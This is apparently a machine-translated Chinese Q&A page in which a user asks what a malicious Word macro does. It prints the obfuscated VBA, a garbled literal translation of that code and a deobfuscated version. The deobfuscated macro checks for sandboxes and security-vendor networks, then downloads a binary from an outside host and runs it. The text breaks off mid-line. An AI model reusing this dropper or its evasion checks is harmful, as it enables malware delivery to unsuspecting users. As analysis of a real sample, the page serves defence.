这个恶意vba代码到底做了什么?
我刚在我的工作场所收到这个基于宏的文档,其中包含恶意宏代码。这个恶意vba代码到底做了什么?,vba,ms-word,Vba,Ms Word,我刚在我的工作场所收到这个基于宏的文档,其中包含恶意宏代码。 由于vb.net并不是我的强项,我无法确切地理解它的功能。 这是我在文档中能找到的唯一宏。 由于代码非常模糊,我认为这是恶意的 Public Sub Document_Close() On Error GoTo SWuc ZQZf Exit Sub SWuc: End Sub Public Sub ZQZf() Dim vmKT As String Dim UwuV As String Set PUQqU = CallByName(T
由于vb.net并不是我的强项,我无法确切地理解它的功能。 这是我在文档中能找到的唯一宏。
由于代码非常模糊,我认为这是恶意的
Public Sub Document_Close()
On Error GoTo SWuc
ZQZf
Exit Sub
SWuc:
End Sub
Public Sub ZQZf()
Dim vmKT As String
Dim UwuV As String
Set PUQqU = CallByName(ThisDocument, s(61, "pocpiiAtlna", 107), 2)
If CallByName(PUQqU, s(74, "mrUaeeNs", 29), 2) = s(31, "RESU", 35) Then UWaFZ (s(40, "uadrBsm naee", 89))
If CallByName(CallByName(PUQqU, s(41, "liFtneceRse", 109), 2), s(33, "tonCu", 8), 2) < 3 Then UWaFZ (s(72, "sih daByrot", 32))
Set mVEL = qizB(s(271, "5n.tq.ipHetWtnRs1tipe.HWtu", 99))
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(414, "m/t///g.xwsei2ooi./ty1p/dawpmcvecmw:ht.imn", 151), False
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(62, "eeerrfR", 52), s(399, "arwmytxla/.es.eipicdwomha/-:dtew/-tmod/c-smnpsn", 452)
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln czdN0e Mrs0b", 221)
CallByName mVEL, s(11, "dneS", 11), 1
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(29, "'PnIa Cestsaecrodld at ", 67))
vmKT = CallByName(mVEL, s(115, "esnopseRtxeT", 71), 2)
For Each ofJE In OImbM
If InStr(LCase(vmKT), LCase(ofJE)) <> 0 Then UWaFZ (s(67, " daB:PSI", 23) & ofJE)
Next
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(237, "pnwm/cbtotoii.t/9cgf6h/9.cf1n:eo/oei", 101), False
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln czdN0e Mrs0b", 221)
CallByName mVEL, s(11, "dneS", 11), 1
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(261, "rCo nniitoaeddyawbf'lnl a", 249))
Set zGFN = CallByName(qizB(s(108, "lpltW.SSchrei", 41)), s(97, "nemnorivnEt", 43), 2, s(17, "OSCPERS", 9))
UwuV = zGFN(s(23, "PMET", 7)) & CallByName(PUQqU, s(74, "arapeShtaProt", 77), 2) & s(46, "1tt83mm2.pp", 37)
Set wATB = qizB(s(128, "BmSDrDa.AtOe", 19))
CallByName wATB, s(17, "yTep", 11), 4, 1
CallByName wATB, s(27, "nepO", 11), 1
CallByName wATB, s(41, "rWeti", 29), 1, CallByName(mVEL, s(32, "BesyooseRndp", 101), 2)
CallByName wATB, s(35, "olaTiSeFev", 37), 1, UwuV, 2
CallByName wATB, s(8, "solCe", 14), 1
CallByName qizB(s(108, "lpltW.SSchrei", 41)), s(31, "cexE", 7), 1, UwuV
End Sub
Public Function OImbM()
OImbM = rHOu(Array(s(7, "MANOZA", 29), s(71, "OYOSNNMUA", 59), s(60, "DTNIEBFREED", 86), s(11, "ULBTAOC E", 26), s(101, "TSS SMIOYECCS", 139), _
s(41, "OCULD", 7), s(83, "EC ATADRETN", 109), s(15, "ECATADRETN", 69), s(107, "ARETENADTC", 93), s(47, "EADCDIEDT", 34), s(99, "P,SO ELSTE", 93), _
s(54, "IYREEFE", 9), s(17, "TRPNOEIFCO", 27), s(66, "ROFTENIT", 31), s(71, "EHRENZT", 69), s(16, "ETSOHD", 59), s(65, "SOHGNIT", 27), _
s(22, "ABEEESLW", 77), s(85, "COISMOTRF", 61), s(23, "ECROFN", 35), s(12, "SSV AOH", 74), s(95, "PNRFIPOOTO", 37), s(41, "ISUTERYC", 51), _
s(13, "ESREVR", 29), s(205, "HOGETL SNNICROTSOGE", 46), s(89, "RTEDMCORN I", 17), s(15, "AWTSURTEV", 62), s(19, "RAIO RNHEATMC", 75), _
s(44, "AUORCLPKEKBMCTASO", 80), s(25, "AMESICTM", 59), s(11, "RTORCIMDNE", 99)))
End Function
Public Sub UWaFZ(ByVal ltfqE As String)
Err.Raise Number:=2, Description:=ltfqE
End Sub
Public Function qizB(ByVal DVnR As String)
Set qizB = feZmA(CreateObject(DVnR))
End Function
Public Function feZmA(ByVal jfcO As Object)
Set feZmA = jfcO
End Function
Public Function rHOu(ByVal iMqIc)
rHOu = iMqIc
End Function
Public Function s(ByVal DDniC As Integer, ByVal Sfrf As String, ByVal QuJk As Integer) As String
Dim qnJn As Integer
qnJn = GzSvR(DDniC, Len(Sfrf))
Do While Len(s) < Len(Sfrf)
s = s & gOtmH(Sfrf, qnJn)
qnJn = GzSvR((qnJn + QuJk), Len(Sfrf))
Loop
End Function
Public Function gOtmH(ByVal vdHA As String, ByVal qnJn As Integer) As String
gOtmH = Right(Left(vdHA, qnJn + 1), 1)
End Function
Public Function GzSvR(ByVal JtMKn As Integer, ByVal PfnR As Integer) As Integer
GzSvR = JtMKn - (PfnR * (JtMKn \ PfnR))
End Function
公共子文档\u Close()
关于错误转到SWuc
ZQZf
出口接头
SWuc:
端接头
公共分公司ZQZf()
作为字符串的Dim vmKT
将UwuV设置为字符串
设置PUQqU=CallByName(此文档,s(61,“Pocpiatlna”,107),2)
如果CallByName(PUQqU,s(74,“mrUaeeNs”,29),2)=s(31,“RESU”,35),那么UWaFZ(s(40,“uadrBsm naee”,89))
如果CallByName(CallByName(PUQqU,s(41,“liFtneceRse”,109),2),s(33,“tonCu”,8),2)小于3,则UWaFZ(s(72,“sih daByrot”,32))
设置mVEL=qizB(s(271,“5n.tq.IPHEWTNRS1TIPE.HWtu”,99))
CallByName mVEL,s(27,“nepO”,11),1,s(28,“EGT”,8),s(414,“m/t///g.xwsei2ooi./ty1p/dawpmcvecmw:ht.imn”,151),假
CallByName mVEL,s(97,“qSeueaetdsReterH”,35),1,s(62,“eeerrfR”,52),s(399,“arwmytxla/.es.eipicdwomha/-:dtew/-tmod/c-smnpsn”,452)
CallByName mVEL,s(97,“qSeueaetdsReterH”,35),1,s(15,“AetgrUe sn”,53),s(635,“0.0T/61nIplt6WMoieT;;(oi.l0)Tw1i5;.dEaa/.iSmln czdN0e Mrs0b”,221)
CallByName mVEL,s(11,“dneS”,11),1
如果CallByName(mVEL,s(13,“tSsuta”,11),2)>=400,则UWaFZ(s(29,“PnIa Cestsaecrodld at”,67))
vmKT=CallByName(mVEL,s(115,“esnopseRtxeT”,71),2)
对于OImbM中的每个JE
如果仪器(LCase(vmKT),LCase(ofJE))为0,则UWaFZ(s(67,“daB:PSI”,23)和ofJE)
下一个
CallByName mVEL,s(27,“nepO”,11),1,s(28,“EGT”,8),s(237,“pnwm/CBTOTOOII.t/9cgf6h/9.cf1n:eo/oei”,101),假
CallByName mVEL,s(97,“qSeueaetdsReterH”,35),1,s(15,“AetgrUe sn”,53),s(635,“0.0T/61nIplt6WMoieT;;(oi.l0)Tw1i5;.dEaa/.iSmln czdN0e Mrs0b”,221)
CallByName mVEL,s(11,“dneS”,11),1
如果CallByName(mVEL,s(13,“tSsuta”,11),2)>=400,则UWaFZ(s(261,“rCo nniitoaeddyawbf'lnl a”,249))
设置zGFN=CallByName(qizB(s(108,“lpltW.SSchrei”,41)),s(97,“nemnorivnEt”,43),2,s(17,“示波器”,9))
UwuV=zGFN(s(23,“PMET”,7))和CallByName(PUQqU,s(74,“arapestaprot”,77),2)和s(46,“1tt83mm2.pp”,37)
设置wATB=qizB(s(128,“BmSDrDa.AtOe”,19))
CallByName wATB,s(17,“yTep”,11),4,1
CallByName wATB,s(27,“nepO”,11),1
CallByName wATB,s(41,“rWeti”,29),1,CallByName(mVEL,s(32,“BesyooseRndp”,101),2)
CallByName wATB,s(35,“olaTiSeFev”,37),1,UwuV,2
CallByName wATB,s(8,“solCe”,14),1
呼叫人姓名qizB(s(108,“lpltW.SSchrei”,41)),s(31,“cexE”,7),1,UwuV
端接头
公共职能OImbM()
OImbM=rHOu(数组(s(7,“MANOZA”,29),s(71,“OYOSNNMUA”,59),s(60,“Dtnibfreed”,86),s(11,“ULBTAOC E”,26),s(101,“TSS smoyeccs”,139)_
s(41,“OCULD”,7),s(83,“EC ATADRETN”,109),s(15,“ECATADRETN”,69),s(107,“ARETENADTC”,93),s(47,“EADCDIEDT”,34),s(99,“P,SO ELSTE”,93)_
s(54,“IYREEFE”,9),s(17,“TRPNOEIFCO”,27),s(66,“ROFTENIT”,31),s(71,“EHRENZT”,69),s(16,“ETSOHD”,59),s(65,“SOHGNIT”,27)_
s(22,“ABEEESLW”,77),s(85,“COISMOTRF”,61),s(23,“ECROFN”,35),s(12,“SSV AOH”,74),s(95,“PNRFIPOOTO”,37),s(41,“ISUTERYC”,51)_
s(13,“ESREVR”,29),s(205,“HOGETL SNNICROTSOGE”,46),s(89,“RTEDMCORN I”,17),s(15,“AWTSURTEV”,62),s(19,“RAIO RNHEATMC”,75)_
s(44,“Auorclpkebmctaso”,80),s(25,“AMESICTM”,59),s(11,“RTORCIMDNE”,99)))
端函数
公共子UWaFZ(ByVal ltfqE作为字符串)
错误。提升编号:=2,说明:=ltfqE
端接头
公共函数qizB(ByVal DVnR作为字符串)
设置qizB=feZmA(CreateObject(DVnR))
端函数
公共函数feZmA(ByVal jfcO作为对象)
设置feZmA=jfcO
端函数
公共职能rHOu(ByVal iMqIc)
rHOu=iMqIc
端函数
公共函数s(ByVal DDniC为整数,ByVal Sfrf为字符串,ByVal QuJk为整数)为字符串
作为整数的Dim qnJn
qnJn=GzSvR(DDniC,Len(Sfrf))
当镜头<镜头(Sfrf)
s=s&gOtmH(Sfrf,qnJn)
qnJn=GzSvR((qnJn+qjk),Len(Sfrf))
环
端函数
公共函数gOtmH(ByVal vdHA作为字符串,ByVal qnJn作为整数)作为字符串
gOtmH=右(左(vdHA,qnJn+1),1)
端函数
公共函数GzSvR(ByVal JtMKn为整数,ByVal PfnR为整数)为整数
GzSvR=JtMKn-(PfnR*(JtMKn\PfnR))
端函数
Public Sub Document_Close()
On Error GoTo QuietExit
MaliciousCode
Exit Sub
QuietExit:
End Sub
Public Sub MaliciousCode()
Err.Raise 666, , "Do not execute this." 'NOTE: I added this ;-)
Dim response As String
Dim filePath As String
Set wdApp = ThisDocument.Application
If wdApp.UserName = "USER" Then Err.Raise 2, "Bad username"
If wdApp.RecentFiles.Count < 3 Then Err.Raise 2, "Bad history"
Set webRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
webRequest.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
webRequest.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
webRequest.Send
If webRequest.Status >= 400 Then Err.Raise 2, "Can't locate IP address"
response = webRequest.ResponseText
For Each isp In GetBadISPList
If InStr(LCase(response), LCase(isp)) <> 0 Then Err.Raise 2, "Bad ISP: " & isp
Next
webRequest.Open "GET", "http://one99two.com/cgi/office16.bin", False
webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
webRequest.Send
If webRequest.Status >= 400 Then Err.Raise 2, "Can't download binary file"
Set env = CreateObject("WScript.Shell").Environment("PROCESS")
filePath = env("TEMP") & wdApp.PathSeparator & "tmp8213.tmp"
Set outStream = CreateObject("ADODB.Stream")
outStream.Type = adTypeBinary
outStream.Open
outStream.Write webRequest.ResponseBody
outStream.SaveToFile
outStream.Close
CreateObject("WScript.Shell").Exec filePath
End Sub
Public Function GetBadISPList()
GetBadISPList = Array("AMAZON", "ANONYMOUS", "BITDEFENDER", "BLUE COAT", "CISCO SYSTEMS", _
"CLOUD", "DATA CENTER", "DATACENTER", "DATACENTRE", "DEDICATED", "ESET, SPOL", _
"FIREEYE", "FORCEPOINT", "FORTINET", "HETZNER", "HOSTED", "HOSTING", _
"LEASEWEB", "MICROSOFT", "NFORCE", "OVH SAS", "PROOFPOINT", "SECURITY", _
"SERVER", "STRONG TECHNOLOGIES", "TREND MICRO", "TRUSTWAVE", "NORTH AMERICA", _
"BLACKOAKCOMPUTERS", "MIMECAST", "TRENDMICRO")
End Function
公共子文档\u Close()
错误时转到QuietExit
恶意代码
出口接头
QuietExit:
端接头
公共子恶意代码()
错误。Raise 666,“不要执行此操作。”“注意:我添加了此;-)
作为字符串的暗淡响应
将文件路径设置为字符串
Set wdApp=ThisDocument.Application
如果wdApp.UserName=“USER”,则错误提示2,“错误用户名”
如果wdApp.RecentFiles.Count<3,则错误提升2,“错误历史记录”
设置webRequest=CreateObject(“WinHttp.WinHttpRequest.5.1”)
webRequest。打开“获取”https://www.maxmind.com/geoip/v2.1/city/me”“错
webRequest.SetRequestHeader“Referer”https://www.maxmind.com/en/locate-my-ip-address"
webRequest.SetRequestHeader“用户代理”、“Mozilla/5.0(兼容;MSIE 10.0;Windows NT 6.1;Trident/6.0)”
webRequest.Send
如果webRequest.Status>=400,则错误提示2,“找不到IP地址”
response=webRequest.ResponseText
对于GetBadISPList中的每个isp
如果InStr(LCase(response)、LCase(isp))为0,则错误提示2,“坏isp:&isp
下一个
webRequest。打开“获取”http://one99two.com/cgi/office16.bin”“错
webRequest.SetRequestHeader“用户代理”、“Mozilla/5.0(兼容;MSIE 10.0;Windows NT 6.1;Trident/6.0)”
webRequest.Send
如果webRequest.Status>=400,则错误提示2,“无法下载二进制文件”
Set env=CreateObject(“WScript.Shell”).Environment(“进程”)
filePath=env(“TEMP”)&wdApp.PathSeparator&“tmp8213.tmp”
设置超出流=Cr